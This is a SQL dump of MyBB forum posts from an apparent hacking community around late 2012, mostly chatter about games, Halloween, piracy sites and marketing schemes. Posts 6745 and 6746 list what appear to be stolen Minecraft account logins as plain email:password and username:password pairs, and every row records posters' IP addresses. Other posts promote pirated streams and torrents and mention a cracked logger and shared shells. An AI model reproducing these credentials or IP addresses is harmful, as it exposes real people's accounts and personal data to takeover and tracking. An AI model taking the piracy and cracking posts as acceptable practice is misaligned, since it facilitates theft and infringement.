`smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6737', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '1', 't3h jok3r', '1351659596', 'I agree with the OP. I also bought this game and honestly it\'s a waste of money, I appreciate you for posting this warning.', '72.231.24.165', '1223104677', '1', '0', '1', '1351659616', '1', 'a1b89e2c5273a5273922a47d5f78ecf2', '0', '1351659616'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6738', '1155', '0', '3', 'Happy Halloween', '0', '1', 't3h jok3r', '1351660263', 'Happy Halloween everyone. First halloween of L33T Hacking!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '00e3d14a1255041530c72021a937502d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6739', '1143', '6705', '24', 'RE: NEED HELP', '0', '257', 'XxTREYZxX', '1351661746', 'Could you please help me do this like a step by step on how to do this thanks for your time', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '440d18ec13139ccf30fc3a1d44422f47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6740', '1155', '6738', '3', 'RE: Happy Halloween', '0', '257', 'XxTREYZxX', '1351662309', 'Thanks you joker and happy holloween to you to ,are you doing anything.', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'ce5d7f24347561f4feac1569553bbd62', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6741', '1086', '6316', '75', 'RE: Skyrim Cheats and tips', '0', '257', 'XxTREYZxX', '1351662607', 'I might check out but i don\'t play skyrim anymore so yeah :O', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '10805bac45cbdfc4664d557db7cfd5c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6742', '1153', '6733', '64', 'RE: Watch Prison Break full online for free', '0', '257', 'XxTREYZxX', '1351662925', 'i Already knew this site but thanks for the share anyway :O', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '00f93cdf4126218cf484dec88ed820e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6743', '1156', '0', '64', 'Walking dead', '0', '257', 'XxTREYZxX', '1351663300', 'Hey guys if you love the walking dead tv series and want to watch all of the go to this site where you can download them so yeah enjoy :L http://www.free-tv-video-online.me/internet/the_walking_dead/season_1.html enjoy', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '6b1c320f05401a5074321bc31b856aae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6744', '1157', '0', '74', '[1.4.X] Minecraft Nodus Force Op [Direct Link][Not Patched 10/30/12]', '0', '257', 'XxTREYZxX', '1351663724', 'Sorry closed this thread :(', '203.104.11.9', '-882373879', '1', '0', '257', '1351663787', '1', '4fcdb3b5764050d7b350989d8ad1071a', '0', '1351663787'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6745', '1158', '0', '74', 'A few minecraft accounts that might work', '0', '257', 'XxTREYZxX', '1351664983', 'Hey guys Here are some account\'s that might work. I found them from different places. Hope you enjoy! [No survey\'s] gilig26@aim.com:wewewe janis1197@inbox.lv:vikings455 ben.malin@hotmail.com:Hotdog123 jquilty@uk2.net:bentley taylor.leigh@ymail.com:baseball thijs.bastiaens@hotmail.com:148818 I\'ll try and find more and post them here! Enjoy! and also post some of your account\'s you found here.', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2c07d7c0a0ce2857aa8d97af7dbed4c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6746', '1159', '0', '74', 'More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351665158', 'Front2battle:12345wow Gobbyer:Bissemaatt1 Jaeroll:1ragnarok hyzor:duffman92 Gabbychick:243900evans gasman0606:bowser55 illidan064:064galatar Ferguson86:2364107prf drue123:hanna123 ftbigfoot:Password1 herakleion:01fe02de Forsiss:1234qwer Gaaraisbest:Dragon09 hagenation:purple123 Hispaghost:4g0st3r0 gilian1993:nailig123 hardmike:michael88 Ferretz2:1q2w3e4r Frankthegank:7y8nuzap frostdan:qwertydan2004 jimskill4:prono1337 hansrocks125125:drago125125', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '621cedb05d1c709b540c8e7a09794e9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6952', '1166', '6930', '46', 'RE: [Guide] Reporting Phishing Pages', '0', '1', 't3h jok3r', '1351917769', '[quote=\'sirchamp\' pid=\'6930\' dateline=\'1351890232\'] [quote]l33thacking.net then the phished URL would be l33thacking.net [/quote] I dont see any difference there. [/quote] My bad. l33thacking.c0m auto changes to l33thacking.net', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '9eb881fc2691dc52ab22353cf63bda5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6748', '1155', '6738', '3', 'RE: Happy Halloween', '0', '205', 'mothered', '1351681029', 'I don\'t celebrate It In my locality, but for those who do, wishing you all a very happy day.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f6ff035807319bdb2c36e63f6485f071', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6749', '1155', '6738', '3', 'RE: Happy Halloween', '0', '228', 'VirtualLegend', '1351684179', 'Happy Halloween To All LH Members', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f96a4793238646c0055d90acf6b64210', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6750', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '228', 'VirtualLegend', '1351684232', '30/10 Sexy Ass Totidile', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5b5c2a85e70e10ed97b17c7e20f20109', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6751', '1147', '6716', '9', 'RE: BRAIN FREEZE - Moneymaking Method', '0', '228', 'VirtualLegend', '1351684291', 'What is it about? Can you put more information about it?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ca6725a4409f115f49a2ffbfd895279c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6752', '1097', '6358', '9', 'RE: Monetizing e-book', '0', '228', 'VirtualLegend', '1351684387', 'Is it a GPT Site? or something else?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e25c1bab1d1d148c4086f67269900d74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6753', '1155', '6738', '3', 'RE: Happy Halloween', '0', '61', 'NXK', '1351684422', 'Happy Halloween everyone, We\'ve made it this far. Can\'t wait for next years.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '09661af4e21eb29ddc52bfb124e9bd7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6754', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '228', 'VirtualLegend', '1351684514', 'I don\'t like the game ether, my friend has it', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a69b96f0a04c611ecba9111824fef177', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6755', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '302', 'Mac Miller', '1351686628', 'Welcome man this is a great site hope you stay active!!', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', '9308b5b2029776953f5be659270bd2f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6756', '1155', '6738', '3', 'RE: Happy Halloween', '0', '302', 'Mac Miller', '1351686670', 'Happy Haloween and i hope this site is up for a long time!!!', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', '43e36f040c502cc8c1678dca65d9c469', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6757', '1160', '0', '9', '? Ebay Gold Digger System ? [ Highly Recommended ]', '0', '228', 'VirtualLegend', '1351692573', '[align=center][img]http://img17.imageshack.us/img17/4516/ebaywsosalesletter.jpg[/img] [b][color=#FF0000][size=x-large]New Money Making System Reveals How To Build A Super-Responsive Email List By Using The Power Of eBay & Opening The Doors To A Constant Flow Of Hot \"Ready-To-Buy\" Leads At No Cost! [/size][/color][/b] [b][color=#32CD32][size=medium]These are buyers wanting & waiting anxiously to buy more stuff from YOU![/size][/color][/b] Dear Internet Marketer Friend, [color=#FFFFFF][size=small]Gone are the times when you could get \'cheap\' qualified leads for cents; we all know that, but what if I tell you that I\'ve been getting hot leads for nothing! you read it well! I\'ve been getting hot buying leads that are buying what I want to sell them over and over again, to make it more clear for you I\'m constantly building super-responsive email list that love to get emails from me! I\'ll share this secret with YOU because I realised that there is no way for this system to get saturated and I want to help you to make money asap![/size][/color] [color=#32CD32][size=medium][b]Wait! Read this:[/b][/size][/color] [size=medium][color=#FF0000][b]This is NOT about:[/b][/color][/size] [color=#FFFFFF][size=small]X Dropshiping. X Making a living from eBay directly. X Selling stuff on eBay to make money (you wont make good money on eBay but you will from them). X A Step by Step guide in how to use eBay... or even worst in how to create an account! X A short term strategy. X A push button system that will make you rich. X Doing nothing and making money over night. If you are thinking on getting any of those you better look somewhere else![/size][/color] [b][color=#32CD32][size=medium]What is it then?[/size][/color][/b] [color=#FFFFFF][size=small]What I\'m offering you is a proven system that works and that will allow you to make money on a regular basis, you can grow super-fast using this system and make $1000\'s per day...in the end it will be up to you. We are going to use the power of eBay to get their more valuable asset: their buyers! In other words, I\'m giving you the power to build ultra-responsive targeted lists that will buy stuff from you every time you email them![/size][/color] [color=#32CD32][size=medium][b]But, I know nothing about eBay! [/b][/size][/color] [color=#FFFFFF][size=small]That\'s ok because the concepts to build your list & the software are very easy to apply & use (newbie friendly).[/size][/color] [color=#FFD700][b][size=x-large]Download Link:[/size][/b][/color] [quote][url=http://adfoc.us/9383011537780]Click Here To Download[/url][/quote][/align] [b][color=#FFD700][size=x-large][align=center]For More Information Go to the Sales Page:[/align][/size][/color][/b] [quote][url=http://www.warriorforum.com/warrior-special-offers-forum/698769-ebay-list-building-system-software-get-hot-leads-cero-cost-while-others-pay-100s-them.html][align=center]Click Here For The Sales Page[/align][/url][/quote]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '33bbd14e02f595a6a58d61505a9a1f0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6758', '1161', '0', '65', '????? YIFY Torrents ?????', '0', '228', 'VirtualLegend', '1351693111', '[color=#FFFFFF][size=small][align=left]Hello People :P, Today I Want to show you a good torrent site with the best HQ Movies. I\'m NOT ADVERTSING !!!, It\'s just that i want to share a good site where you can download almost every movie. I\'m using it for years and I\'m still satisfied with the Quality of the site. If you are a Utorrent or Bittorrent user than i would recommend this site, if you know more sites like these post it below! Site:[url=http://yify-torrents.com/] http://yify-torrents.com/[/url] [/align][/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ef280c804946062cfbaeffc22425e9b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6759', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '264', 'D?ea', '1351696414', 'I can easily drink 5 cans at a night, and nothing happns to me.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '71c70fb035bd18cf66f595c2c9813cdd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6760', '1124', '6549', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '264', 'D?ea', '1351696461', '[quote=\'iTzIpod\' pid=\'6549\' dateline=\'1351457019\'] I remember that there once was a man selling his virginity online and the bid was like $7,000,000+ He was a body builder. I may be wrong. :p [/quote] Damn I would have made a bid :roflol:', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'b351356e438c70beb6ea5470e64b83b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6761', '1124', '6541', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '228', 'VirtualLegend', '1351696612', '[align=center][img]http://i1.kym-cdn.com/entries/icons/original/000/006/707/nothing-to-do-here-template.jpg.scaled500.jpg[/img][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a5e0187aec7729bbfe4d0f281105d0f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6762', '1124', '6541', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '302', 'Mac Miller', '1351696675', 'Damn i should say im a virgin and try to get money lol.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '7229c141bbcffa80f3c34b19a51c7def', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6763', '1136', '6597', '47', 'RE: C++ Tutorial Givaway', '0', '228', 'VirtualLegend', '1351696689', 'No Problem Read the rules before posting something to prevent this :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ddae4545941bef55e42e3d2b12102c8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6764', '1162', '0', '12', 'Rank your YouTube videos to Number #1', '0', '228', 'VirtualLegend', '1351696998', '[color=#FFFFFF][size=medium]* DEDICATED GMAIL: Go to Google and set up a new G account and put your videos keyword/s in the g address with your niche as the username. * KEYWORD ENHANCED USERNAME: Next, head over to Youtube and open up a NEW account. Choose a user name that has the same keyword/s as your new email address (Your videos keyword/s). This is most important for step 3. Use your new G address as your Google account to connect your Youtube account to. Now you should have a newly registered account with your keyword/s as the user name. This username is about to be used as anchor text for linking to your vid. * PROMOTION: Upload your 1 video to this new account and NEVER upload another video to this account ever again. Here’s why… Once you have uploaded your video you will see it featured on the top of your Youtube channel page. This is where Youtube features your latest video upload. Any link juice that flows on to your channel page will only benefit the video in that “Featured Box” so it is important that your new video be the only one that is ever there. Next we are going to quickly (under an hour) send masses of PR4-PR7 Do-Follow back links to your channel page which will act as instant back links for your video. BACKLINKING: Go to the search box at the top of the Youtube page and do a search for your keyword. This should bring back pages of results. Go through the results and click on each videos user name to visit their channel. You are looking for channels with PR4 or better. When you find one just leave a comment on their channel (Bottom of their channel page) and you will see your keyword anchor text show up as your username next to your comment. Comments do not have to mention your keyword again and do not need to be relevant to your niche so just say something nice. This anchor text from these comments is DO FOLLOW and will provide INSTANT high quality link juice straight to whatever video is in the featured spot on your channel page. The more you add the better your video will do ! After 24 hours do a search for your keyword again on Youtube and you should generally see it in the top 10 after this short amount of time. [/size][/color] [u][b][color=#32CD32][size=x-large]Credits to reazahmed[/size][/color][/b][/u]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6835d492b6869b8681e42e744018b631', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6765', '1091', '6688', '56', 'RE: Rate the avatar above you', '0', '302', 'Mac Miller', '1351697402', '[quote=\'iTzIpod\' pid=\'6688\' dateline=\'1351624893\'] ?/10 I don\'t know who that is.. :p I also don\'t really like listening to Mac Miller. :( [/quote] It\'s Mac Miller lol and 9/10 Flashing Monkey is epic :O', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', 'c026d135b90593c79023bb26d96890b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6766', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '302', 'Mac Miller', '1351698117', 'Good Hope you guys like them and to people who already like them. Golf Wang lol.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '85e3e46c810920d4eb0973f7b45ec770', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6767', '1143', '6705', '24', 'RE: NEED HELP', '0', '67', 'HoverCatz', '1351699647', 'Disable Hamachi. Hamachi sometimes \"steals\" your internet', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '3fbcb740bf3c47651ebccdc293d06e1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6768', '1163', '0', '35', 'You Like it ? [ Rate My Graphic ]', '0', '228', 'VirtualLegend', '1351700732', '[color=#FFFFFF][size=medium]What do you think about my new signature ? - Do i Need to add more stuff to it? - Make it bigger? - Give me some tips [/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '98dcd025b607703160f64fd822a87698', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6769', '1155', '6738', '3', 'RE: Happy Halloween', '0', '53', 'sirchamp', '1351703827', 'Happy Halloween. Time pasts so fast...', '7.29.48.243', '119353587', '1', '0', '0', '0', '1', 'c350626f6c1f98df75d6571526adb401', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6770', '1155', '6738', '3', 'RE: Happy Halloween', '0', '222', 'Exposé', '1351704137', 'Happy Halloween bitches.....:D', '74.76.78.78', '1246514766', '1', '0', '0', '0', '1', '9f4d0a31ec771884a14057ed3d799259', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6771', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '67', 'HoverCatz', '1351708493', 'Im Very good making servers, as i live coding them.', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'ebf1da2c4d2578d935a57fc0da175e1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6772', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '67', 'HoverCatz', '1351708596', 'I already bought 10 copies o.o jk', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'e34f5b976258356eb35c48e625c3769d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6773', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '67', 'HoverCatz', '1351708812', '3/10 unclear image, can barely see who it is. is he showing his finger or holding an object?', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '5771e7dad276cd32fd3dbb33045e5fda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6774', '951', '6771', '71', 'RE: L33thacking Minecraft Server', '0', '228', 'VirtualLegend', '1351710047', '[quote=\'HoverCatz\' pid=\'6771\' dateline=\'1351708493\'] Im Very good making servers, as i live coding them. [/quote] Okay If everyone has time we will be making a server', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '014dbbb228339c9137590c53c1008031', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6775', '1148', '6718', '30', 'RE: [Crack] Limitless Logger 6.7 !!', '0', '228', 'VirtualLegend', '1351710493', 'What for program is it? Can you put more info about it', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '09cb43824c92b88b325c832738c90ef3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6776', '1142', '6684', '24', 'RE: Fuck you Internet Explorer', '0', '82', 'iTzIpod', '1351715123', 'I use Google Chrome instead. It loads fast and looks simple and easy to use.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '359c0d2d9dc3e2d9246cf737ac14d7d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6777', '1144', '6706', '11', 'RE: What can you do with?', '0', '82', 'iTzIpod', '1351715159', 'You can boot their IP Address offline, you can track down their location.. You can do somewhat a lot of things with it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5614017a49c4d8899269035f5381be9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6778', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1351715254', 'Yeah and the OP said that it\'s premium though too. It\'s not. It just allows you to call people in a group chat and share screen in a group chat with 2 or more people. Skype Premium allows you to call people and text people via SMS. But this doesn\'t allow it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '784a5387a1c8b98f5fb1368993ff36d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6779', '1152', '6730', '21', 'RE: Private Hard Hitting Shells', '0', '82', 'iTzIpod', '1351715286', 'Nice share! Thanks a lot for your contribution! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e258cb01bd22b57fffad4dd9d12ab00b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6780', '1153', '6733', '64', 'RE: Watch Prison Break full online for free', '0', '82', 'iTzIpod', '1351715353', 'Thanks for the share! I\'ll share this with my friend who wants a 